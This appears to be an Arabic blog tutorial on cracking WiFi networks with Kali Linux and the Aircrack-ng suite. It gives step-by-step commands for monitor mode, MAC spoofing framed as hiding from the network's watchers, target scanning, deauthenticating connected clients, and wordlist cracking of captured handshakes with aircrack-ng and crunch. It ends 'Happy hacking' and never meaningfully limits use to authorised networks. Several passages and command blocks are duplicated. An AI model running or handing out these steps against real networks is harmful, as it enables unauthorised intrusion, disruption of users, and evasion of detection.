السلام عليكم ورحمة الله وبركاته الحمد
لله وحده نحمده ونشكره ونستعين به ونستغفره وأشهد أن محمدا عبده ورسوله
صلى الله عليه وسلم وعلى آله وصحبه
في البداية نقوم بعمل كورس بسيط على اللينكس لفهم أساسيات إختبار إختراق شبكات الوايرليس Wireless.
يجب أن تكون على دراية أن أفضل التوزيعات لإختبار إختراق شبكات الوايرليس Wireless بالنسبة لي Kali linux لإحتواءاها على أقوى أداة لإختبار إختراق شبكات الوايرلس من بينها Aircrack-ng وهناك أدوات أخرى لكن أداة Aircrack-ng اختيرت من بين أقواه , وهناك توزيعات أخرى كنت قد تحدثت عنها سابقا في احدى المقالات الخطوات السليمة لإختبار إختراق شبكات الوايرلس Wireless
يجب أن تكون على دراية أن أفضل التوزيعات لإختبار إختراق شبكات الوايرليس Wireless بالنسبة لي Kali linux لإحتواءاها على أقوى أداة لإختبار إختراق شبكات الوايرلس من بينها Aircrack-ng وهناك أدوات أخرى لكن أداة Aircrack-ng اختيرت من بين أقواه , وهناك توزيعات أخرى كنت قد تحدثت عنها سابقا في احدى المقالات الخطوات السليمة لإختبار إختراق شبكات الوايرلس Wireless
أما أنا فسوف أستخدم توزيعة كالي بالنسبة لتوزيعة باك تراك لمن ﻻ يعرفها فهي توزيعة من توزيعات لينكس مبنية على اوبنتو تحتوي هذه التوزيعة على العديد من البرامج والادوات المخصصة لإختبار الاختراق واخر نسخة منها هي توزيعة باك تراك الخامسه
وبعدها تم بناء توزيعة اخرى ظهرت في الاونة الاخيرة الا وهي توزيعة كالي لينكس Kali linux تعتبر هذه التوزيعة من احدث التوزيعات المشهورة في عالم الاختراق وهي مبنية على ديبيان
يمكنك تثبيث التوزيعة بواسطة برنامج لعمل الاجهزة الوهمية بمعني انك تستطيع من خلال هذا البرنامج ان تقوم بتثبيت اي نظام تشغيل ومن بينها VirtuelBox أو Vmware workstation
بعد تثبيث احدى توزيعات لينكس تأتي مرحلة التي تليها وهي تثبيث الأدوات ومعرفة كارت الوايرليس
ملاحظة :
في توزيعة باك تراك أو الكالي لينكس لا يحتجان إلى تثبيث الأدوات وبالنسبة لي فأنا استخدم توزيعة كالي لينكس Kali linux كنظام أساسي يتم تثبيثه بجانب نظام الويندوز أما بالنسبة لكارت الوايرلس Wireless فأستخدم جهاز ألفا يتم التعرف عليه من قبل توزيعة كالي لينكس Kali linux بدون تثبيث الـ Driver
الأدوات التي يجب تثبيثها في حالة استخدام أنظمة أخرى هي :
الأدوات التي يجب تثبيثها في حالة استخدام أنظمة أخرى هي :
Aircrack-ng
Wifite
linset
wifiphisher
Wifite
linset
wifiphisher
لتحميل الأدوات السالفة الذكر
http://www.aircrack-ng.org
https://code.google.com/p/wifite/downloads/list
https://code.google.com/p/wifite/downloads/list
وعليه يبقى التعريف بالكارت الويفي وخاصة إذا كنا في العمل على برامج محاكاة الانظمة الوهمية كالـ VirtuelBox أو Vmware workstation وسوف نستخدم كارت الالفا وهو كارت وايرليس خارجي ويتميز بانه يغطي منطقة اكبر من التي يغطيها كارت الوايرليس الافتراضي الموجود في الجهاز حيث أن داتا بايس Data bases الخاصة به اكبر منها من الموجود في الكارت المدمج في الجهاز
لتوصيل الكارت بـبرنامج محاكاة الانظمة الوهمية
في حالة انك تستخدم برنامج VirtualBox
اذهب الي الاعدادات واختار اعدادات USB
اضغط علي Add كما هو بالصورة ومن ثم تستطيع ان تضيف الكارت إلى الجهاز الوهمي
في حالة انك تستخدم برنامج Vmware
سوف تجدها في توولبار الموجود في الاسفل اضغط عليها واختار كونكت
وبعد توصليها نتاكد انها متصلة بالجهاز عن طريق الامر ifconfig نلاحظ انها متصلة وتاخد الاسم Wlan1 أو Wlan0
وظهور كرتين اخرين وهما eth0 lo
لعرض معلومات عن كارت الوايرليس ننفذ الامر التالي iwconfig
في هذا الوضع فانك تستطيع ان تتصل باي شبكة مصرح لك بالاتصال بها وتستطيع ان تستفيد من كل الخدمات التي تقدمها هذه الشبكة ولكنك لا تسطيع ان تجمع اي معلومات عن اي شبكة اخرى ولكي نستطيع فعل ذلك يتوجب علينا ان نفعل ما يعرف بـ monitor mode
هذا الـmode نستطيع ان نجمع المعلومات عن الشبكات المحيطة بنا من معرفة انواع التشفير وفكها وعدد المستخدمين المتصلين بالشبكة لمعرفة الكروت التي يمكن تفيعل مونيتور مود monitor mode عليها نقوم بتنفيذ الامر
airmon-ng
نلاحظ انه لم يقوم الا بعرض كارت الوايرليس ومن أجل تفعيلها نكتب الأمر التالي :
airmon-ng start wlan0
وبعد عمل عرض كروت الشبكة نلاحظ ظهور كارت جديده وهي mon0 وذلك بالأمر ifconfig
ومن أجل إيقافها نقوم بالأمر التالي airmon-ng stop mon0
الخطوه التي تليها جد مهمة وذلك القيام بتزوير ماك أدريس
اخفاء الهوية وفي حالة انك تسعي لاختراق شبكة وتحاول ان تجمع المعلومات اللازمة لذلك ونحجت واستطعت الوصول للشبكة فان من يراقب الشبكة يكون علي علم بك من خلال الماك ادرس الخاص بك لذلك كان من الضروري تغير الماك ادريس الي ماك ادرس مزيف لكي لا يستطيع الوصول اليك
ولتغير الماك الخاص بك سوف نستخدم اداة وهي macchanger
وذلك بكتابة الأمر التالي macchanger -r wlan0
هنا تعني اي ماك اخر غير الماك الأصلي -r
اذا كنت ترغب بتغير الماك اي ماك معين وذلك بكتابة الأمر التالي
ومن أجل إيقافها نقوم بالأمر التالي airmon-ng stop mon0
الخطوه التي تليها جد مهمة وذلك القيام بتزوير ماك أدريس
اخفاء الهوية وفي حالة انك تسعي لاختراق شبكة وتحاول ان تجمع المعلومات اللازمة لذلك ونحجت واستطعت الوصول للشبكة فان من يراقب الشبكة يكون علي علم بك من خلال الماك ادرس الخاص بك لذلك كان من الضروري تغير الماك ادريس الي ماك ادرس مزيف لكي لا يستطيع الوصول اليك
ولتغير الماك الخاص بك سوف نستخدم اداة وهي macchanger
وذلك بكتابة الأمر التالي macchanger -r wlan0
هنا تعني اي ماك اخر غير الماك الأصلي -r
اذا كنت ترغب بتغير الماك اي ماك معين وذلك بكتابة الأمر التالي
macchanger -m xx:xx:xx:xx:xx:xx wlan0
الخطوة اللي بعدها لعرض معلومات الشبكات المحيطة بنا نقوم بتنفيذ الامر عبر الأداه airodump-ng
من خلال الأمر التالي airodump-ng mon0
نلاحظ ان ناتج الامر مقسم الي جزئين الجزء الاعلى وهو يحتوي علي معلومات عن الشبكة بصفة عامة أما الجزء السفلي والمهم يحتوي على معلومات خاصة بالشبكة والمستخدمين المتصلين بهم
في حالة وجود كلمة ( not associated ) فأعلم هذا أن المستخدم غير متصل باي شبكة حتي الان بعض الخصائص توضح طريقة البحث عن الـ BSSID اذا اردنا ان نبحث عن شبكة معينة عن طريق الأمر التالي :
airodump-ng mon0 --bssid 01:32:A1:B7:E2:A5 --channel 10
واذا اردنا ان نحدد نوع تشفير معين من خلال الأمر التالي :
airodump-ng mon0 –encrypt WPA2
واذا اردنا ان نبحث عن الشبكات الموجود علي تشنل معين :
airodump-ng mon0 –channel 10
أو
airodump-ng mon0 –c 10
والكتابة التي تعجبني وذلك بعد جمع كافة المعلومات و التي في حد ذاتها تساهم في جمع المعلومات اللازمة من أجل فك الشيفرة وهي
airodump-ng mon0 --c 1 --write capfile --bssid 01:32:A1:B7:E2:A5
من أجل زيادة جمع البيانات نقوم بفتح ترمنال أخر وتكتب هذا الكود
aireplay-ng --deauth 5 -a [BSSID] -c [STATION] mon0
بعد الإنتهاء من جمع المعلومات نلاحظ وجود 4 ملفات
نأتي بفتح ترمنال أخر
ونكتب هذا الكود
aircrack-ng -w [PasswordList].txt [txtfile].ivs
والكتابة التي تعجبني وذلك بعد جمع كافة المعلومات و التي في حد ذاتها تساهم في جمع المعلومات اللازمة من أجل فك الشيفرة وهي
airodump-ng mon0 --c 1 --write capfile --bssid 01:32:A1:B7:E2:A5
من أجل زيادة جمع البيانات نقوم بفتح ترمنال أخر وتكتب هذا الكود
aireplay-ng --deauth 5 -a [BSSID] -c [STATION] mon0
بعد الإنتهاء من جمع المعلومات نلاحظ وجود 4 ملفات
نأتي بفتح ترمنال أخر
ونكتب هذا الكود
aircrack-ng -w [PasswordList].txt [txtfile].ivs
أو
aircrack-ng -w [PasswordList].txt [txtfile].cap
Happy hacking ;)
N.B:
The super wireless card Alfa Networks AWUSO36NHA you can buy this card on line for around $25 - $40
To check if your card can do packet injection after creating the monitor mode interface open a terminal and type in:
aireplay-ng -9 mon0 (This will tell you your percentage of injection)
Crunch (Can Even Create Wordlists)
crunch min max 'letters in passwords' | aircrack-ng '.cap file' -w - -e 'Essid'
___________________________________________________________
BSSID : الماك ادريس للشبكة
CH : التشنل الموجودة عليها الشبكة
ENC : نوع التشفير المستخدم في الشبكة
ESSID : اسم الشبكة
Data : عدد الباكتس او البيانات التي ترسل من والي الشبكة
Beacons : الباكتس التي تقوم الشبكة بارسالها الي اي كارت وايرليس (لا يشترط ان يكون متصل بها ) وتحتوي علي معلومات عن الشبكة كاسمها ونوع التشفير والتشنل الموجودة عليها و …. الخ
CIPHER : الخوارزمية التي تعمل على توليد التشفير
STATION : الماك ادريس الخاص بالمستخدم المتصل بالشبكة
BSSID : الماك ادريس للشبكة
CH : التشنل الموجودة عليها الشبكة
ENC : نوع التشفير المستخدم في الشبكة
ESSID : اسم الشبكة
Data : عدد الباكتس او البيانات التي ترسل من والي الشبكة
Beacons : الباكتس التي تقوم الشبكة بارسالها الي اي كارت وايرليس (لا يشترط ان يكون متصل بها ) وتحتوي علي معلومات عن الشبكة كاسمها ونوع التشفير والتشنل الموجودة عليها و …. الخ
CIPHER : الخوارزمية التي تعمل على توليد التشفير
STATION : الماك ادريس الخاص بالمستخدم المتصل بالشبكة
Probe : اسم المستخدم
Frames : عدد من الباكتس (فريم باكت) مرسل بين الشبكة والمستخدم
Frames : عدد من الباكتس (فريم باكت) مرسل بين الشبكة والمستخدم